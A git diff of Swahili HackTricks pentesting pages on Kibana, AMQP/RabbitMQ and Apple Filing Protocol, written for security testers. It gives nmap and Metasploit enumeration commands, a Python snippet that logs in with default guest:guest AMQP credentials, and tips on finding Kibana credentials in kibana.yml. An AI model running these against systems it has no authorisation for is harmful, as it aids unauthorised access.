<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

56
network-services-pentesting/5601-pentesting-kibana.md
View file

@ -1,53 +1,55 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kibana inajulikana kwa uwezo wake wa kutafuta na kuonyesha data ndani ya Elasticsearch, kawaida ikifanya kazi kwenye bandari **5601**. Inatumika kama kiolesura cha kikundi cha Elastic Stack kwa kazi za ufuatiliaji, usimamizi, na usalama.
Kibana inajulikana kwa uwezo wake wa kutafuta na kuonyesha data ndani ya Elasticsearch, kwa kawaida ikikimbia kwenye bandari **5601**. Inatumika kama kiolesura cha ufuatiliaji, usimamizi, na kazi za usalama za klasta ya Elastic Stack.
## Kuelewa Uthibitishaji
## Understanding Authentication
Mchakato wa uthibitishaji katika Kibana unahusishwa kwa asili na **vitambulisho vinavyotumiwa katika Elasticsearch**. Ikiwa Elasticsearch ina uthibitishaji uliowezeshwa, Kibana inaweza kupatikana bila vitambulisho vyovyote. Kwa upande mwingine, ikiwa Elasticsearch imehifadhiwa na vitambulisho, vitambulisho sawa vinahitajika kupata Kibana, ikidumisha ruhusa sawa za mtumiaji kwenye jukwaa zote mbili. Vitambulisho vinaweza kupatikana katika faili ya **/etc/kibana/kibana.yml**. Ikiwa vitambulisho hivi havihusiani na mtumiaji wa **kibana_system**, vinaweza kutoa haki za ufikiaji zaidi, kwani ufikiaji wa mtumiaji wa kibana_system umepunguzwa kwa APIs za ufuatiliaji na indeksi ya .kibana.
Mchakato wa uthibitishaji katika Kibana unahusiana kwa karibu na **vithibitisho vinavyotumika katika Elasticsearch**. Ikiwa Elasticsearch haina uthibitishaji, Kibana inaweza kufikiwa bila vithibitisho vyovyote. Kinyume chake, ikiwa Elasticsearch imeimarishwa kwa vithibitisho, vithibitisho hivyo hivyo vinahitajika kufikia Kibana, ikihifadhi ruhusa sawa za mtumiaji katika majukwaa yote mawili. Vithibitisho vinaweza kupatikana katika faili **/etc/kibana/kibana.yml**. Ikiwa vithibitisho hivi havihusiani na mtumiaji **kibana_system**, vinaweza kutoa haki pana za ufikiaji, kwani ufikiaji wa mtumiaji kibana_system umepunguziliwa kwa API za ufuatiliaji na index ya .kibana.
## Hatua Baada ya Kupata Ufikiaji
## Actions Upon Access
Marafiki kupata Kibana, hatua kadhaa zinashauriwa:
Mara tu ufikiaji wa Kibana unavyokuwa salama, hatua kadhaa zinashauriwa:
- Kuchunguza data kutoka Elasticsearch inapaswa kuwa kipaumbele.
- Uwezo wa kusimamia watumiaji, ikiwa ni pamoja na kuhariri, kufuta, au kuunda watumiaji, majukumu, au funguo za API mpya, unapatikana chini ya Usimamizi wa Kundi -> Watumiaji/Majukumu/Funguo za API.
- Ni muhimu kuangalia toleo lililowekwa la Kibana kwa kasoro zinazojulikana, kama vile kasoro ya RCE iliyojulikana katika toleo kabla ya 6.6.0 ([Maelezo Zaidi](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)).
- Uwezo wa kusimamia watumiaji, ikiwa ni pamoja na kuhariri, kufuta, au kuunda watumiaji wapya, majukumu, au funguo za API, unapatikana chini ya Usimamizi wa Stack -> Watumiaji/Majukumu/Funguo za API.
- Ni muhimu kuangalia toleo lililowekwa la Kibana kwa udhaifu unaojulikana, kama vile udhaifu wa RCE ulioainishwa katika matoleo kabla ya 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)).
## Uzingatiaji wa SSL/TLS
## SSL/TLS Considerations
Katika hali ambapo SSL/TLS haijaanzishwa, uwezekano wa kuvuja kwa habari nyeti unapaswa kuchunguzwa kwa kina.
Katika hali ambapo SSL/TLS haijawashwa, uwezekano wa kuvuja kwa taarifa nyeti unapaswa kutathminiwa kwa kina.
## Marejeo
## References
* [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

90
network-services-pentesting/5671-5672-pentesting-amqp.md
View file

@ -1,33 +1,36 @@
# 5671,5672 - Pentesting AMQP
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):
From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):
> **RabbitMQ** ni **programu ya foleni ya ujumbe** inayojulikana pia kama _message broker_ au _queue manager_. Kwa ufupi, ni programu ambapo foleni zinatengenezwa, ambapo programu zinahusiana ili kuhamisha ujumbe au ujumbe.\
> Ujumbe unaweza kuwa na aina yoyote ya habari. Inaweza, kwa mfano, kuwa na habari kuhusu mchakato au kazi ambayo inapaswa kuanza kwenye programu nyingine (ambayo inaweza hata kuwa kwenye seva nyingine), au inaweza kuwa ujumbe wa maandishi tu. Programu ya queue-manager inahifadhi ujumbe hadi programu ya kupokea inapounganisha na kuchukua ujumbe kutoka kwenye foleni. Programu ya kupokea kisha inaprocess ujumbe.\
> **RabbitMQ** ni **programu ya kupanga ujumbe** inayojulikana pia kama _mwakilishi wa ujumbe_ au _msimamizi wa foleni._ Kwa ufupi; ni programu ambapo foleni zinafafanuliwa, ambazo programu zinajiunga ili kuhamasisha ujumbe au ujumbe.\
> Ujumbe **unaweza kujumuisha aina yoyote ya habari**. Inaweza, kwa mfano, kuwa na habari kuhusu mchakato au kazi ambayo inapaswa kuanza kwenye programu nyingine (ambayo inaweza hata kuwa kwenye seva nyingine), au inaweza kuwa ujumbe rahisi wa maandiko. Programu ya msimamizi wa foleni inahifadhi ujumbe hadi programu inayopokea inajiunga na kuchukua ujumbe kutoka kwenye foleni. Programu inayopokea kisha inashughulikia ujumbe huo.\
Definition from .
**Default port**: 5672,5671
```
PORT STATE SERVICE VERSION
5672/tcp open amqp RabbitMQ 3.1.5 (0-9)
```
## Uchambuzi
## Enumeration
### Kwa Mkono
### Manual
```python
import amqp
#By default it uses default credentials "guest":"guest"
@ -37,20 +40,6 @@ for k, v in conn.server_properties.items():
print(k, v)
```
### Kiotomatiki
AMQP (Advanced Message Queuing Protocol) ni itifaki ya mawasiliano ambayo hutumiwa kwa ajili ya kuwasiliana na mifumo ya ujumbe. Inaruhusu programu mbalimbali kubadilishana ujumbe kwa njia ya njia ya ujumbe. Kwa mfano, inaweza kutumika kwa ajili ya kuwasiliana kati ya seva na wateja, au kati ya seva mbili.
Katika mchakato wa pentesting, ni muhimu kuelewa jinsi AMQP inavyofanya kazi na jinsi inavyoweza kudukuliwa. Hii inaweza kusaidia kugundua udhaifu na kuchukua hatua za kiusalama zinazofaa.
Kuna njia kadhaa za kiotomatiki za kufanya pentesting kwenye itifaki ya AMQP. Hapa kuna baadhi ya zana maarufu:
- **RabbitMQ-CLI**: Hii ni zana ya amri ya mstari wa amri ambayo inaruhusu kufanya operesheni mbalimbali kwenye seva ya RabbitMQ. Inaweza kutumika kwa ajili ya kuchunguza mazingira ya RabbitMQ na kufanya majaribio ya kudukua.
- **AMQP-Client**: Hii ni maktaba ya Python ambayo inaruhusu kuunda wateja wa AMQP na kufanya operesheni mbalimbali kama kutuma na kupokea ujumbe. Inaweza kutumika kwa ajili ya kujenga skana za kiotomatiki na kufanya majaribio ya kudukua.
- **Metasploit**: Hii ni jukwaa la usalama ambalo linatoa zana mbalimbali za kudukua. Ina moduli kadhaa zinazohusiana na AMQP, ambazo zinaweza kutumika kwa ajili ya kufanya majaribio ya kudukua kwenye mifumo ya AMQP.
Kwa kutumia zana hizi za kiotomatiki, unaweza kufanya pentesting kwenye mifumo ya AMQP kwa njia ya haraka na yenye ufanisi. Hii inaweza kusaidia kugundua udhaifu na kuchukua hatua za kiusalama zinazofaa ili kulinda mifumo yako dhidi ya mashambulizi.
```bash
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info <IP>
@ -72,38 +61,39 @@ PORT STATE SERVICE VERSION
```
### Brute Force
* [**AMQP Itifaki ya Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace)
* [**STOMP Itifaki ya Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq)
* [**AMQP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace)
* [**STOMP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq)
## Bandari Nyingine za RabbitMQ
## Mipangilio Mingine ya RabbitMQ
Katika [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) unaweza kupata kwamba **rabbitmq hutumia bandari kadhaa**:
Katika [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) unaweza kupata kwamba **rabbitmq inatumia mipangilio kadhaa**:
* **1883, 8883**: ([wateja wa MQTT](http://mqtt.org) bila na na TLS, ikiwa [programu-jalizi ya MQTT](https://www.rabbitmq.com/mqtt.html) imeamilishwa. [**Jifunze zaidi kuhusu jinsi ya kufanya pentest MQTT hapa**](1883-pentesting-mqtt-mosquitto.md).
* **4369: epmd**, huduma ya ugunduzi wa rika inayotumiwa na nodi za RabbitMQ na zana za CLI. [**Jifunze zaidi kuhusu jinsi ya kufanya pentest kwenye huduma hii hapa**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
* **5672, 5671**: hutumiwa na wateja wa AMQP 0-9-1 na 1.0 bila na na TLS
* **15672**: wateja wa [API ya HTTP](https://www.rabbitmq.com/management.html), [UI ya usimamizi](https://www.rabbitmq.com/management.html) na [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (tu ikiwa [programu-jalizi ya usimamizi](https://www.rabbitmq.com/management.html) imeamilishwa). [**Jifunze zaidi kuhusu jinsi ya kufanya pentest kwenye huduma hii hapa**](15672-pentesting-rabbitmq-management.md).
* 15674: wateja wa STOMP-over-WebSockets (tu ikiwa [programu-jalizi ya Web STOMP](https://www.rabbitmq.com/web-stomp.html) imeamilishwa)
* 15675: wateja wa MQTT-over-WebSockets (tu ikiwa [programu-jalizi ya Web MQTT](https://www.rabbitmq.com/web-mqtt.html) imeamilishwa)
* 15692: takwimu za Prometheus (tu ikiwa [programu-jalizi ya Prometheus](https://www.rabbitmq.com/prometheus.html) imeamilishwa)
* 25672: hutumiwa kwa mawasiliano kati ya nodi na zana za CLI (bandari ya seva ya usambazaji ya Erlang) na imepangiwa kutoka kwa safu ya kipekee (imezuiliwa kwa bandari moja tu kwa chaguo-msingi, inahesabiwa kama bandari ya AMQP + 20000). Isipokuwa mawasiliano ya nje kwenye bandari hizi ni muhimu sana (kwa mfano, kikundi kinatumia [federation](https://www.rabbitmq.com/federation.html) au zana za CLI zinatumika kwenye mashine zilizo nje ya subnet), bandari hizi hazipaswi kuwa wazi kwa umma. Angalia [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo zaidi. **Ni bandari 9 tu kati ya hizi zilizofunguliwa kwenye mtandao**.
* 35672-35682: hutumiwa na zana za CLI (bandari za wateja wa usambazaji wa Erlang) kwa mawasiliano na nodi na imepangiwa kutoka kwa safu ya kipekee (imehesabiwa kama bandari ya usambazaji ya seva + 10000 hadi bandari ya usambazaji ya seva + 10010). Angalia [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo zaidi.
* 61613, 61614: [wateja wa STOMP](https://stomp.github.io/stomp-specification-1.2.html) bila na na TLS (tu ikiwa [programu-jalizi ya STOMP](https://www.rabbitmq.com/stomp.html) imeamilishwa). Chini ya vifaa 10 na bandari hii wazi na kwa kawaida UDP kwa nodi za DHT.
* **1883, 8883**: ([Wateja wa MQTT](http://mqtt.org) bila na na TLS, ikiwa [plugin ya MQTT](https://www.rabbitmq.com/mqtt.html) imewezeshwa. [**Jifunze zaidi kuhusu jinsi ya pentest MQTT hapa**](1883-pentesting-mqtt-mosquitto.md).
* **4369: epmd**, huduma ya kugundua wenzake inayotumiwa na nodi za RabbitMQ na zana za CLI. [**Jifunze zaidi kuhusu jinsi ya pentest huduma hii hapa**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
* **5672, 5671**: inatumika na wateja wa AMQP 0-9-1 na 1.0 bila na na TLS
* **15672**: [HTTP API](https://www.rabbitmq.com/management.html) wateja, [UI ya usimamizi](https://www.rabbitmq.com/management.html) na [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (tu ikiwa [plugin ya usimamizi](https://www.rabbitmq.com/management.html) imewezeshwa). [**Jifunze zaidi kuhusu jinsi ya pentest huduma hii hapa**](15672-pentesting-rabbitmq-management.md).
* 15674: wateja wa STOMP-over-WebSockets (tu ikiwa [plugin ya Web STOMP](https://www.rabbitmq.com/web-stomp.html) imewezeshwa)
* 15675: wateja wa MQTT-over-WebSockets (tu ikiwa [plugin ya Web MQTT](https://www.rabbitmq.com/web-mqtt.html) imewezeshwa)
* 15692: metriki za Prometheus (tu ikiwa [plugin ya Prometheus](https://www.rabbitmq.com/prometheus.html) imewezeshwa)
* 25672: inatumika kwa mawasiliano kati ya nodi na zana za CLI (bandari ya seva ya usambazaji ya Erlang) na inatengwa kutoka kwa anuwai ya dinamik (imepangwa kwa bandari moja kwa chaguo-msingi, inakokotwa kama bandari ya AMQP + 20000). Iwapo muunganisho wa nje kwenye mipangilio hii ni muhimu sana (kwa mfano, klasta inatumia [federation](https://www.rabbitmq.com/federation.html) au zana za CLI zinatumika kwenye mashine nje ya subnet), mipangilio hii haipaswi kufichuliwa hadharani. Tazama [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo. **Ni mipangilio 9 tu kati ya hizi iliyo wazi kwenye mtandao**.
* 35672-35682: inatumika na zana za CLI (bandari za mteja wa usambazaji wa Erlang) kwa mawasiliano na nodi na inatengwa kutoka kwa anuwai ya dinamik (inakatwa kama bandari ya usambazaji wa seva + 10000 kupitia bandari ya usambazaji wa seva + 10010). Tazama [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo.
* 61613, 61614: [wateja wa STOMP](https://stomp.github.io/stomp-specification-1.2.html) bila na na TLS (tu ikiwa [plugin ya STOMP](https://www.rabbitmq.com/stomp.html) imewezeshwa). Chini ya vifaa 10 vyenye bandari hii wazi na hasa UDP kwa nodi za DHT.
## Shodan
* `AMQP`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

56
network-services-pentesting/584-pentesting-afp.md
View file

@ -1,55 +1,57 @@
# 548 - Kupima Apple Filing Protocol (AFP)
# 548 - Pentesting Apple Filing Protocol (AFP)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**Apple Filing Protocol** (**AFP**), zamani inajulikana kama AppleTalk Filing Protocol, ni itifaki maalum ya mtandao iliyomo ndani ya **Huduma ya Faili ya Apple** (**AFS**). Imeundwa kutoa huduma za faili kwa macOS na mfumo wa zamani wa Mac OS. AFP inajulikana kwa kusaidia majina ya faili ya Unicode, ruhusa za POSIX na orodha za kudhibiti upatikanaji, vifurushi vya rasilimali, sifa za ziada zilizopewa majina, na taratibu za kufunga faili za kisasa. Ilikuwa itifaki kuu ya huduma za faili katika Mac OS 9 na toleo za awali.
**Apple Filing Protocol** (**AFP**), zamani ikijulikana kama AppleTalk Filing Protocol, ni protokali maalum ya mtandao iliyojumuishwa ndani ya **Apple File Service** (**AFS**). Imeundwa kutoa huduma za faili kwa macOS na Mac OS ya jadi. AFP inajitofautisha kwa kuunga mkono majina ya faili ya Unicode, POSIX na ruhusa za orodha ya udhibiti wa ufikiaji, forks za rasilimali, sifa za ziada zenye majina, na mifumo ya kufunga faili ya kisasa. Ilikuwa protokali kuu ya huduma za faili katika Mac OS 9 na matoleo ya awali.
**Bandari ya Default:** 548
**Default Port:** 548
```bash
PORT STATE SERVICE
548/tcp open afp
```
### **Uchambuzi**
### **Kuhesabu**
Kwa ajili ya uchambuzi wa huduma za AFP, amri na hati zifuatazo ni muhimu:
Kwa kuhesabu huduma za AFP, amri na skripti zifuatazo ni muhimu:
```bash
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
```
**Scripts na Maelezo Yao:**
**Scripts and Their Descriptions:**
- **afp-ls**: Hii script hutumiwa kuorodhesha volumes na faili zilizopo za AFP.
- **afp-path-vuln**: Inaorodhesha volumes na faili zote za AFP, ikionyesha hatari za usalama.
- **afp-serverinfo**: Hutoa taarifa za kina kuhusu seva ya AFP.
- **afp-showmount**: Inaorodhesha hisa za AFP zilizopo pamoja na ACL zao husika.
- **afp-ls**: Hii script inatumika kuorodhesha volumu na faili za AFP zinazopatikana.
- **afp-path-vuln**: Inataja volumu na faili zote za AFP, ikionyesha uwezekano wa udhaifu.
- **afp-serverinfo**: Hii inatoa maelezo ya kina kuhusu seva ya AFP.
- **afp-showmount**: Inataja sehemu zinazopatikana za AFP pamoja na ACL zao husika.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
